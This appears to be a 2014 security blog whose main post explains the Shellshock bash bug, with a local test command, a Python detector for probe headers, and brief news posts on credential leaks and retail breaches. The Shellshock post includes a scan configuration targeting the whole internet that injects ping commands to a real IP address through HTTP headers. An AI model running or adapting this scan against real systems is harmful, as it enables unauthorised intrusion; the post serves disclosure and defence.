2014-09-25

Shellshock Bash bug

The newest contender for the title of biggest vulnerability ever discovered. A short introduction:

What assets are vulnerable?
Bash shells – in other words, all assets running Unix/Linux operating systems. This includes servers, networking devices, firewalls and appliance boxes.

Which versions of Bash are affected?
Everything through version 4.3, which means about 25 years’ worth of versions!

When was this publicly announced?
On Wednesday the 24th, around noon (GMT).
This means all the bad guys out there have had the code to attack since then. The longer we wait to defend ourselves, the more likely we are to become a victim.

Mitigating Controls:
The simplest option is to disable any CGI functionality that makes calls to a shell, and indeed some are recommending this. In many cases, though, that’s going to be a seriously breaking change and, at the very least, one that is going to require some extensive testing to ensure it doesn’t cause immediate problems.

How to check if my asset is vulnerable?
There’s a very simple test, which is just running this command within your shell:
env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get “busted” echoed back, you’ve successfully exploited the bug and the asset is vulnerable. Note that the command only exercises bash if /bin/sh is bash on that system; where /bin/sh is another shell (e.g. dash), run it with bash in place of /bin/sh.

Exploit’s POC?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74   *
http-header = Host:() { :; }; ping -c 3 209.126.230.74     *  
http-header = Referer:() { :; }; ping -c 3 209.126.230.74  *

*  Essentially asking the vulnerable assets to ping the attacker. This is what a white-hat (non-malicious) attacker would do; a bad guy would code in something much more sinister.
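As an added defender-side example (not code from the original post or from any of the tools it mentions): the probes above work because a CGI server copies request headers into environment variables before invoking a shell, so a detection can simply look for the function-definition prefix in header values and name the CGI variable that would have carried it. The sample requests, the loose regex and the helper names are my own constructions.

```python
import re

# Bash's trigger is an environment variable whose value starts with "() {".
# This regex is deliberately looser than bash's own check (extra or missing
# whitespace is tolerated) so that trivially altered probes are still flagged.
PROBE = re.compile(r"^\(\s*\)\s*\{")

# Constructed sample requests, not real traffic: one benign, two probes.
# 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE_REQUESTS = [
    "GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n",
    "GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: () { :; }; /bin/ping -c 3 192.0.2.10\r\n"
    "Cookie: () { :; }; /bin/ping -c 3 192.0.2.10\r\n\r\n",
    "GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.com\r\n"
    "Referer: (){ :;}; echo busted\r\n\r\n",
]


def parse_headers(raw_request):
    """Split a raw HTTP/1.x request into (name, value) header pairs."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return headers


def cgi_env_name(header_name):
    """Generic CGI mapping (RFC 3875): a request header becomes HTTP_<NAME>.
    Content-Type and Content-Length are special-cased by CGI and are not
    handled here (assumption: only ordinary headers are of interest)."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def find_shellshock_probes(raw_request):
    """Return (header, env-var) pairs whose value carries a function prefix."""
    return [
        (name, cgi_env_name(name))
        for name, value in parse_headers(raw_request)
        if PROBE.match(value)
    ]


def triage(requests):
    """Run the check over a batch of raw requests; empty lists are benign."""
    return [find_shellshock_probes(r) for r in requests]
```

The same check applies to any other header a server exposes to CGI scripts, not only the three used in the scan configuration above.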

2014-09-23

Keyless SSL

Establishing secure connections without sharing the private keys. I am sure this comes at the cost of losing a bit of security, but the benefits are evident!

2014-09-12

5 Million Gmail Credentials Leaked

It is not clear what the source of this leak is. Apparently Gmail says they were not compromised.

Update 20-Sep-14:
Seems like Google wasn't compromised, and the majority of the leaked credentials are incorrect. Could be an old dump?!

2014-09-03

Dairy Queen & Home Depot Compromised

Either the hacking activity has increased this year, or maybe the companies are being more honest about public disclosures.

DQ:  A spokesman for Dairy Queen has confirmed that the company recently heard from the U.S. Secret Service about “suspicious activity” related to a strain of card-stealing malware found in hundreds of other retail intrusions.
[update 11-Oct-14] DQ has confirmed the breach at 395 stores.

Home Depot:  The latest victim of Russian hackers specializing in point-of-sale (POS) theft appears to be the venerable do-it-yourself store, Home Depot. A large cache of credit- and debit-card information, dubbed ‘American Sanctions,’ has appeared ...

iCloud Bruteforced - Celeb photos leaked

A hacker allegedly breached Apple’s iCloud service and copied the personal photos of at least 100 high-profile stars.